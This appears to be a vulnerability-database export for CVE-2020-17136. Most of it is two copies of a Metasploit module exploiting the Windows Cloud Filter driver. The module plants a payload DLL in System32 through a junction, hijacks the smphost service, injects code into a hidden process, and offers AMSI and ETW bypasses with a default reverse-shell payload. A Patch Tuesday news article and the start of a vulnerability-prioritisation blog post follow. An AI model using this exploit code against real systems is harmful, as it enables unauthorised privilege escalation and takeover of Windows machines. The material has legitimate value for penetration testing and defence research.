\nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!') \nend \n \nbuild_num_raw = cmd_exec('cmd.exe /c ver') \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/) \nif build_num.nil? \nreturn CheckCode::Unknown(\"Couldn't retrieve the target's build number!\") \nelse \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0] \nvprint_status(\"Target's build number: #{build_num}\") \nend \n \nbuild_num_gemversion = Gem::Version.new(build_num) \n# Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/ \nif (build_num_gemversion >= Gem::Version.new('10.0.19042.0')) && (build_num_gemversion < Gem::Version.new('10.0.19042.685')) # Windows 10 20H2 \nreturn CheckCode::Appears('A vulnerable Windows 10 20H2 build was detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.19041.0')) && (build_num_gemversion < Gem::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1 \nreturn CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.1256')) # Windows 10 v1909 \nreturn CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.1256')) # Windows 10 v1903 \nreturn CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1637')) # Windows 10 v1809 \nreturn CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1902')) # Windows 10 v1803 \nreturn CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!') \nelse \nreturn CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!') \nend \nend \n \ndef exploit \nif sysinfo['Architecture'] != 'x64' \nfail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!') \nelsif session.arch != 'x64' \nfail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!') \nend \ndir_junct_path = 'C:\\\\Windows\\\\Temp' \nintermediate_dir = rand_text_alpha(10).to_s \njunction_dir = rand_text_alpha(10).to_s \npath_to_intermediate_dir = \"#{dir_junct_path}\\\\#{intermediate_dir}\" \n \nmkdir(\"#{path_to_intermediate_dir}\") \nif !directory?(\"#{path_to_intermediate_dir}\") \nfail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!') \nend \nregister_dir_for_cleanup(\"#{path_to_intermediate_dir}\") \n \nmkdir(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\") \nif !directory?(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\") \nfail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!') \nend \n \nmount_handle = create_mount_point(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\", 'C:\\\\') \nif !directory?(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\") \nfail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!') \nend \n \nexe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe' \nunless File.file?(exe_path) \nfail_with(Failure::BadConfig, 'Assembly not found') \nend \ninstalled_dotnet_versions = get_dotnet_versions \nvprint_status(\"Dot Net Versions installed on target: #{installed_dotnet_versions}\") \nif installed_dotnet_versions == [] \nfail_with(Failure::BadConfig, 'Target has no .NET framework installed') \nend \nif check_requirements('v4.0.30319', installed_dotnet_versions) == false \nfail_with(Failure::BadConfig, 'CLR required for assembly not installed') \nend \npayload_path = \"C:\\\\Windows\\\\Temp\\\\#{rand_text_alpha(16)}.dll\" \nprint_status(\"Dropping payload dll at #{payload_path} and registering it for cleanup...\") \nwrite_file(payload_path, generate_payload_dll) \nregister_file_for_cleanup(payload_path) \nexecute_assembly(exe_path, \"#{path_to_intermediate_dir} #{junction_dir}\\\\Windows\\\\System32\\\\healthapi.dll #{payload_path}\") \nservice_start('smphost') \nregister_file_for_cleanup('C:\\\\Windows\\\\System32\\\\healthapi.dll') \nsleep(3) \ndelete_mount_point(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\", mount_handle) \nend \n \ndef pid_exists(pid) \nmypid = client.sys.process.getpid.to_i \n \nif pid == mypid \nprint_bad('Cannot select the current process as the injection target') \nreturn false \nend \n \nhost_processes = client.sys.process.get_processes \nif host_processes.empty? \nprint_bad('No running processes found on the target host.') \nreturn false \nend \n \ntheprocess = host_processes.find { |x| x['pid'] == pid } \n \n!theprocess.nil? \nend \n \ndef launch_process \nprocess_name = 'notepad.exe' \nprint_status(\"Launching #{process_name} to host CLR...\") \n \nprocess = client.sys.process.execute(process_name, nil, { \n'Channelized' => true, \n'Hidden' => true, \n'UseThreadToken' => true, \n'ParentPid' => 0 \n}) \nhprocess = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{hprocess.pid} launched.\") \n[process, hprocess] \nend \n \ndef inject_hostclr_dll(process) \nprint_status(\"Reflectively injecting the Host DLL into #{process.pid}..\") \n \nlibrary_path = ::File.join(Msf::Config.data_directory, 'post', 'execute-dotnet-assembly', 'HostingCLRx64.dll') \nlibrary_path = ::File.expand_path(library_path) \n \nprint_status(\"Injecting Host into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \n[exploit_mem, offset] \nend \n \ndef execute_assembly(exe_path, exe_args) \nif sysinfo.nil? \nfail_with(Failure::BadConfig, 'Session invalid') \nelse \nprint_status(\"Running module against #{sysinfo['Computer']}\") \nend \nif datastore['WAIT'].zero? \nprint_warning('Output unavailable as wait time is 0') \nend \n \nprocess, hprocess = launch_process \nexploit_mem, offset = inject_hostclr_dll(hprocess) \n \nassembly_mem = copy_assembly(exe_path, hprocess, exe_args) \n \nprint_status('Executing...') \nhprocess.thread.create(exploit_mem + offset, assembly_mem) \n \nif datastore['WAIT'].positive? \nsleep(datastore['WAIT']) \nread_output(process) \nend \n \nif datastore['KILL'] \nprint_good(\"Killing process #{hprocess.pid}\") \nclient.sys.process.kill(hprocess.pid) \nend \n \nprint_good('Execution finished.') \nend \n \ndef copy_assembly(exe_path, process, exe_args) \nprint_status(\"Host injected. Copy assembly into #{process.pid}...\") \nint_param_size = 8 \nsign_flag_size = 1 \namsi_flag_size = 1 \netw_flag_size = 1 \nassembly_size = File.size(exe_path) \n \ncln_params = '' \ncln_params << exe_args \ncln_params << \"\\x00\" \n \npayload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size \npayload_size += assembly_size + cln_params.length \nassembly_mem = process.memory.allocate(payload_size, PAGE_READWRITE) \nparams = [ \nassembly_size, \ncln_params.length, \ndatastore['AMSIBYPASS'] ? 1 : 0, \ndatastore['ETWBYPASS'] ? 1 : 0, \n2 \n].pack('IICCC') \nparams += cln_params \n \nprocess.memory.write(assembly_mem, params + File.read(exe_path)) \nprint_status('Assembly copied.') \nassembly_mem \nend \n \ndef read_output(process) \nprint_status('Start reading output') \nold_timeout = client.response_timeout \nclient.response_timeout = 5 \n \nbegin \nloop do \noutput = process.channel.read \nif !output.nil? && !output.empty? \noutput.split(\"\\n\").each { |x| print_good(x) } \nend \nbreak if output.nil? || output.empty? \nend \nrescue Rex::TimeoutError \nvprint_warning('Time out exception: wait limit exceeded (5 sec)') \nrescue ::StandardError => e \nprint_error(\"Exception: #{e.inspect}\") \nend \n \nclient.response_timeout = old_timeout \nprint_status('End output.') \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/160919/cve_2020_17136.rb.txt", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-23T07:26:15", "description": "This Metasploit module exploits a vulnerability in cldflt.sys. The Cloud Filter driver on Windows 10 v1803 and later, prior to the December 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don't have permissions to create files in. This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "zdt", "title": "Cloud Filter Arbitrary File Creation / Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17136", "CVE-2020-1170"], "modified": "2021-01-12T00:00:00", "id": "1337DAY-ID-35669", "href": "https://0day.today/exploit/description/35669", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n include Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Post::Windows::Dotnet\n include Msf::Post::Windows::Services\n include Msf::Post::Windows::FileSystem\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',\n 'Description' => %q{\n The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December\n 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when\n calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()\n function with attacker controlled input. This meant that files were created with\n KernelMode permissions, thereby bypassing any security checks that would otherwise\n prevent a normal user from being able to create files in directories\n they don't have permissions to create files in.\n\n This module abuses this vulnerability to perform a DLL hijacking attack against the\n Microsoft Storage Spaces SMP service, which grants the attacker code execution as the\n NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one\n of the Meterpreter payloads, as doing so will allow them to subsequently escalate their\n new session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command\n to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'James Foreshaw', # Vulnerability discovery and PoC creator\n 'Grant Willcox' # Metasploit module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Privileged' => true,\n 'Arch' => [ARCH_X64],\n 'Targets' =>\n [\n [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-10',\n 'References' => [\n ['CVE', '2020-17136'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=2082'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136']\n ],\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n }\n )\n )\n register_options(\n [\n OptBool.new('AMSIBYPASS', [true, 'Enable Amsi bypass', true]),\n OptBool.new('ETWBYPASS', [true, 'Enable Etw bypass', true]),\n OptInt.new('WAIT', [false, 'Time in seconds to wait', 5])\n ], self.class\n )\n\n register_advanced_options(\n [\n OptBool.new('KILL', [true, 'Kill the injected process at the end of the task', false])\n ]\n )\n end\n\n def check_requirements(clr_req, installed_dotnet_versions)\n installed_dotnet_versions.each do |fi|\n if clr_req == 'v4.0.30319'\n if fi[0] == '4'\n vprint_status('Requirements ok')\n return true\n end\n elsif fi[0] == '3'\n vprint_status('Requirements ok')\n return true\n end\n end\n print_error('Required dotnet version not present')\n false\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n build_num_raw = cmd_exec('cmd.exe /c ver')\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)\n if build_num.nil?\n return CheckCode::Unknown(\"Couldn't retrieve the target's build number!\")\n else\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0]\n vprint_status(\"Target's build number: #{build_num}\")\n end\n\n build_num_gemversion = Gem::Version.new(build_num)\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/\n if (build_num_gemversion >= Gem::Version.new('10.0.19042.0')) && (build_num_gemversion < Gem::Version.new('10.0.19042.685')) # Windows 10 20H2\n return CheckCode::Appears('A vulnerable Windows 10 20H2 build was detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.19041.0')) && (build_num_gemversion < Gem::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1\n return CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.1256')) # Windows 10 v1909\n return CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.1256')) # Windows 10 v1903\n return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1637')) # Windows 10 v1809\n return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1902')) # Windows 10 v1803\n return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def exploit\n if sysinfo['Architecture'] != 'x64'\n fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')\n elsif session.arch != 'x64'\n fail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!')\n end\n dir_junct_path = 'C:\\\\Windows\\\\Temp'\n intermediate_dir = rand_text_alpha(10).to_s\n junction_dir = rand_text_alpha(10).to_s\n path_to_intermediate_dir = \"#{dir_junct_path}\\\\#{intermediate_dir}\"\n\n mkdir(\"#{path_to_intermediate_dir}\")\n if !directory?(\"#{path_to_intermediate_dir}\")\n fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')\n end\n register_dir_for_cleanup(\"#{path_to_intermediate_dir}\")\n\n mkdir(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\")\n if !directory?(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\")\n fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')\n end\n\n mount_handle = create_mount_point(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\", 'C:\\\\')\n if !directory?(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\")\n fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')\n end\n\n exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'\n unless File.file?(exe_path)\n fail_with(Failure::BadConfig, 'Assembly not found')\n end\n installed_dotnet_versions = get_dotnet_versions\n vprint_status(\"Dot Net Versions installed on target: #{installed_dotnet_versions}\")\n if installed_dotnet_versions == []\n fail_with(Failure::BadConfig, 'Target has no .NET framework installed')\n end\n if check_requirements('v4.0.30319', installed_dotnet_versions) == false\n fail_with(Failure::BadConfig, 'CLR required for assembly not installed')\n end\n payload_path = \"C:\\\\Windows\\\\Temp\\\\#{rand_text_alpha(16)}.dll\"\n print_status(\"Dropping payload dll at #{payload_path} and registering it for cleanup...\")\n write_file(payload_path, generate_payload_dll)\n register_file_for_cleanup(payload_path)\n execute_assembly(exe_path, \"#{path_to_intermediate_dir} #{junction_dir}\\\\Windows\\\\System32\\\\healthapi.dll #{payload_path}\")\n service_start('smphost')\n register_file_for_cleanup('C:\\\\Windows\\\\System32\\\\healthapi.dll')\n sleep(3)\n delete_mount_point(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\", mount_handle)\n end\n\n def pid_exists(pid)\n mypid = client.sys.process.getpid.to_i\n\n if pid == mypid\n print_bad('Cannot select the current process as the injection target')\n return false\n end\n\n host_processes = client.sys.process.get_processes\n if host_processes.empty?\n print_bad('No running processes found on the target host.')\n return false\n end\n\n theprocess = host_processes.find { |x| x['pid'] == pid }\n\n !theprocess.nil?\n end\n\n def launch_process\n process_name = 'notepad.exe'\n print_status(\"Launching #{process_name} to host CLR...\")\n\n process = client.sys.process.execute(process_name, nil, {\n 'Channelized' => true,\n 'Hidden' => true,\n 'UseThreadToken' => true,\n 'ParentPid' => 0\n })\n hprocess = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{hprocess.pid} launched.\")\n [process, hprocess]\n end\n\n def inject_hostclr_dll(process)\n print_status(\"Reflectively injecting the Host DLL into #{process.pid}..\")\n\n library_path = ::File.join(Msf::Config.data_directory, 'post', 'execute-dotnet-assembly', 'HostingCLRx64.dll')\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Injecting Host into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n [exploit_mem, offset]\n end\n\n def execute_assembly(exe_path, exe_args)\n if sysinfo.nil?\n fail_with(Failure::BadConfig, 'Session invalid')\n else\n print_status(\"Running module against #{sysinfo['Computer']}\")\n end\n if datastore['WAIT'].zero?\n print_warning('Output unavailable as wait time is 0')\n end\n\n process, hprocess = launch_process\n exploit_mem, offset = inject_hostclr_dll(hprocess)\n\n assembly_mem = copy_assembly(exe_path, hprocess, exe_args)\n\n print_status('Executing...')\n hprocess.thread.create(exploit_mem + offset, assembly_mem)\n\n if datastore['WAIT'].positive?\n sleep(datastore['WAIT'])\n read_output(process)\n end\n\n if datastore['KILL']\n print_good(\"Killing process #{hprocess.pid}\")\n client.sys.process.kill(hprocess.pid)\n end\n\n print_good('Execution finished.')\n end\n\n def copy_assembly(exe_path, process, exe_args)\n print_status(\"Host injected. Copy assembly into #{process.pid}...\")\n int_param_size = 8\n sign_flag_size = 1\n amsi_flag_size = 1\n etw_flag_size = 1\n assembly_size = File.size(exe_path)\n\n cln_params = ''\n cln_params << exe_args\n cln_params << \"\\x00\"\n\n payload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size\n payload_size += assembly_size + cln_params.length\n assembly_mem = process.memory.allocate(payload_size, PAGE_READWRITE)\n params = [\n assembly_size,\n cln_params.length,\n datastore['AMSIBYPASS'] ? 1 : 0,\n datastore['ETWBYPASS'] ? 1 : 0,\n 2\n ].pack('IICCC')\n params += cln_params\n\n process.memory.write(assembly_mem, params + File.read(exe_path))\n print_status('Assembly copied.')\n assembly_mem\n end\n\n def read_output(process)\n print_status('Start reading output')\n old_timeout = client.response_timeout\n client.response_timeout = 5\n\n begin\n loop do\n output = process.channel.read\n if !output.nil? && !output.empty?\n output.split(\"\\n\").each { |x| print_good(x) }\n end\n break if output.nil? || output.empty?\n end\n rescue Rex::TimeoutError\n vprint_warning('Time out exception: wait limit exceeded (5 sec)')\n rescue ::StandardError => e\n print_error(\"Exception: #{e.inspect}\")\n end\n\n client.response_timeout = old_timeout\n print_status('End output.')\n end\nend\n", "sourceHref": "https://0day.today/exploit/35669", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-12-08T20:30:01", "description": "Microsoft has addressed 58 CVEs (nine of them critical) for its December 2020 Patch Tuesday update. This brings the computing giant\u2019s patch tally to 1,250 for the year \u2013 well beyond 2019\u2019s 840.\n\nThis month\u2019s security bugs affect Microsoft Windows, Edge (EdgeHTML-based), ChakraCore, Microsoft Office and Office Services and Web Apps, Exchange Server, Azure DevOps, Microsoft Dynamics, Visual Studio, Azure SDK and Azure Sphere, according to the update. None are listed as publicly known or under active attack. Also, no vulnerability was assigned a CVSSv3 severity score of 9.0 or higher.\n\n## **Critical Bug Breakdown**\n\nThree of the critical flaws are found in Microsoft Exchange (CVE-2020-17117, CVE-2020-17132 and CVE-2020-17142), all allowing remote code execution (RCE). [One of these](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) occurs due to improper validation of cmdlet arguments, according to Microsoft, which doesn\u2019t provide an attack scenario but does note that the attacker needs be authenticated with privileges.\n\n\u201cThis indicates that if you take over someone\u2019s mailbox, you can take over the entire Exchange server,\u201d according to Dustin Childs at Trend Micro\u2019s Zero Day Initiative (ZDI), writing in a [Tuesday analysis](<https://www.zerodayinitiative.com/blog/2020/12/8/the-december-2020-security-update-review>). \u201cWith all of the other Exchange bugs, definitely prioritize your Exchange test and deployment.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAlso on the Exchange front, [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) addresses a patch bypass for CVE-2020-16875, which was reported and patched in September\u2019s Patch Tuesday release. While not critical, it\u2019s of note, Childs said.\n\nChilds also flagged [CVE-2020-17121](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17121>), one of two critical RCE bugs in Microsoft SharePoint (the other is [CVE-2020-17118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17118>)). Originally reported through ZDI program, the bug could allow an authenticated user to execute arbitrary .NET code on an affected server in the context of the SharePoint Web Application service account.\n\n\u201cIn its default configuration, authenticated SharePoint users are able to create sites that provide all of the necessary permissions that are prerequisites for launching an attack,\u201d Childs explained. \u201cSimilar bugs [patched earlier this year](<https://threatpost.com/microsofts-patch-tuesday-critical-rce-bugs/159044/>) received quite a bit of attention. We suspect this one will, too.\u201d\n\nIn fact, the Sharepoint CVEs should take patching priority, Immersive Labs\u2019 Kevin Breen, director of cyberthreat research, said via email. \u201cBoth are rated as critical as they have RCE, and Sharepoint can be used like a watering hole inside large organizations by an attacker,\u201d he said. \u201cAll it takes is for a few weaponized documents to be placed for malicious code to spread across an organization.\u201d\n\nAnother critical bug of note is tracked as [CVE-2020-17095](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17095>), a Hyper-V RCE vulnerability that allows an attacker to escalate privileges from code execution in a Hyper-V guest to code execution on the Hyper-V host by passing invalid vSMB packet data. The flaw carries the highest CVSS score in the update, coming in at 8.5, since no special permissions are needed to exploit it.\n\n\u201cTo exploit this vulnerability, an adversary could run a custom application on a Hyper-V guest that would cause the Hyper-V host operating system to allow arbitrary code execution when it fails to properly validate vSMB packet data,\u201d explained Automox researcher Jay Goodman, via email. \u201cThe vulnerability is present on most builds of Windows 10 and Windows Server 2004 and forward.\u201d\n\nTwo post-authentication RCE flaws in Microsoft Dynamics 365 for Finance and Operations (on-premises) ([CVE-2020-17158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17158>) and [CVE-2020-17152](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17152>)) round out the critical patches, along with a memory-corruption issue in the Chakra Scripting Engine, which impacts the Edge browser ([CVE-2020-17131](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17131>)).\n\n\u201cOnly one [of the critical-rated updates] (surprisingly) impacts the browser,\u201d Childs said. \u201cThat patch corrects a bug within the JIT compiler. By performing actions in JavaScript, an attacker can trigger a memory-corruption condition, which leads to code execution. The lack of browser updates could also be a conscious decision by Microsoft to ensure a bad patch for a browser does not disrupt online shopping during the holiday season.\u201d\n\nThough it\u2019s a lighter than usual month for the volume of patches, the steady flow of critical RCE bugs present a great deal of risk, said Justin Knapp, researcher at Automox, via email.\n\n\u201cInstead of having to manipulate a user to click a malicious link or attachment, bad actors merely have to target an unpatched system to gain initial access, at which point a number of methods can be employed to increase access to valuable assets,\u201d he said, referring to this month\u2019s critical RCE problems. \u201cIt goes without saying that the speed at which an organization can deploy these fixes will dictate the level of risk they take on.\u201d\n\n## **Other Bugs, Patching **\n\nIn addition to the critical bugs, a full 46 of the bugs are rated as important, and three are rated moderate in severity. The important bugs include 10 Office issues bugs impacting Outlook, PowerPoint and Excel \u2014 for these, Office 2019 versions for Mac do not have patches yet.\n\n\u201cThis is a book-end to a year that began with Microsoft addressing 49 CVEs in January of 2020, followed by eight consecutive months with over 90 CVEs addressed. In 2020, Microsoft released patches for over 1,200 CVEs,\u201d Satnam Narang, principal research engineer, Tenable, told Threatpost.\n\nPatching may be more difficult than ever going forward. \u201cOne of the things that stands out is that Microsoft has removed a lot of the detail they usually share with such advisories,\u201d Breen said. \u201cFor me, this could lead to some issues. Patching is not as easy as just clicking an update button and security teams like to gain a deeper understanding of what they are doing. Instead, however, they are expected to operate with less information.\u201d\n\nElsewhere, [Adobe issued patches](<https://threatpost.com/adobe-windows-macos-critical-severity-flaws/162007/>) for flaws tied to one important-rated and three critical-severity CVEs, during its regularly scheduled December security updates.\n\n\u201cWhile lighter than usual, the most severe allow for arbitrary code execution including three critical severity CVEs and one less severe (important-rated) flaw identified,\u201d Nick Colyer, researcher from Automox said. \u201cThe holidays present unique challenges to security teams\u2019 upcoming out-of-office time and the severity of the vulnerabilities Adobe has addressed are non-trivial against those challenges. It is important to prioritize any major vulnerabilities during holidays to reduce the threat surface exposed to would-be attackers.\u201d\n\n**_Put Ransomware on the Run: Save your spot for \u201cWhat\u2019s Next for Ransomware,\u201d a _**[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)**_ on Dec. 16 at 2 p.m. ET. Find out what\u2019s coming in the ransomware world and how to fight back. _**\n\n**_Get the latest from John (Austin) Merritt, Cyber Threat Intelligence Analyst at Digital Shadows; Limor Kessem, Executive Security Advisor, IBM Security; and Israel Barak, CISO at Cybereason, on new kinds of attacks. Topics will include the most dangerous ransomware threat actors, their evolving TTPs and what your organization needs to do to get ahead of the next, inevitable ransomware attack. _**[**_Register here_**](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)**_ for the Wed., Dec. 16 for this LIVE webinar._**\n\n**BONUS CONTENT: Download our exclusive **[**FREE Threatpost Insider eBook,**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) [_**Healthcare Security Woes Balloon in a Covid-Era World**_](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)**, sponsored by ZeroNorth.**\n", "cvss3": {}, "published": "2020-12-08T20:23:30", "type": "threatpost", "title": "Microsoft Wraps Up a Lighter Patch Tuesday for the Holidays", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-16875", "CVE-2020-17095", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17121", "CVE-2020-17131", "CVE-2020-17132", "CVE-2020-17142", "CVE-2020-17152", "CVE-2020-17158"], "modified": "2020-12-08T20:23:30", "id": "THREATPOST:02914A68EEB34D94544D5D00BF463BAC", "href": "https://threatpost.com/microsoft-patch-tuesday-holidays/162041/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-01-30T22:26:39", "description": "In this episode I would like to make a status update of my [Vulristics project](<https://github.com/leonov-av/vulristics>). For those who don&#x27;t know, in this project I retrieve publicly available vulnerability data and analyze it to better understand the severity of these vulnerabilities and better prioritize them. Currently, it is mainly about Microsoft Patch Tuesday vulnerabilities, but I have plans to go further. Also in this episode I want to demonstrate the new Vulristics features on Microsoft Patch Tuesday reports for October, November and December 2020.\n\n\n\n## Patch Tuesdays Automated Data Collection\n\nFirst of all, I dealt with the annoying collecting of the data for Microsoft Patch Tuesdays reports. Previously it took pretty long time. I had to go to Microsoft website and [search for CVE IDs](<https://msrc.microsoft.com/update-guide/vulnerability>). After that, 